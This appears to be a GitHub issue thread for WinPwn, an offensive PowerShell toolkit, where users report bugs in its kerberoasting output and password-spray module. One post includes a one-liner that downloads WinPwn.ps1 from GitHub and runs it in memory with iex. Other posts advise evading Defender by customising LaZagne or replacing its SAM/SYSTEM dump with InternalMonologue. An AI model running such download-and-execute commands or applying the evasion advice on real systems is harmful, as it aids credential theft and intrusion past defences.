/nowrap nomore! about winpwn HOT 8 CLOSED

Thanks for the support all good now. Can confirm that /nowrap is sorted also.

from winpwn.

Whoops I‘ll add it again. Domainpasswordspray is also broken atm. Gonna do that tomorrow 👌

from winpwn.

Give e9db01a a try and tell me if its fixed. LaZagne is also replaced, but its signature won´t last long as always with public tools. It´s better to build your own customized version.

from winpwn.

Thanks man.

from winpwn.

Just tested on a win10 box and its detected immediately by Defender.
See screenshot attached.
Interesting that is more about behaviour than the file itself.
This is a similar message im getting for my custom mimikataz file.
Maybe they have updated defender to look more on behaviour.

from winpwn.

One of the first things Lazagne does with the "all" parameter is dumping SAM and SYSTEM hives from the registry to get the SAM-Database credentials. Maybe that is detected, I found many AV/EDR vendors looking for that behaviour in the past. The only method to avoid the detection is to remove the SAM/SYSTEM dump from LaZagne and use for example InternalMonologue for the hashes instead. But I´ll leave that up to you ;-)

from winpwn.

Yo!
Just rechecked option 8 from the menu for kerberoasting and the output loses the /nowrap again, can you update?

For clarity:
I downloaded winpwn in memory using:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
Selected Option: 8
viewed output: "Kerberoasting_Rubeus.txt"

from winpwn.

Fixed with 3ab6c6c. Only fixed it for the Offline version last time.

from winpwn.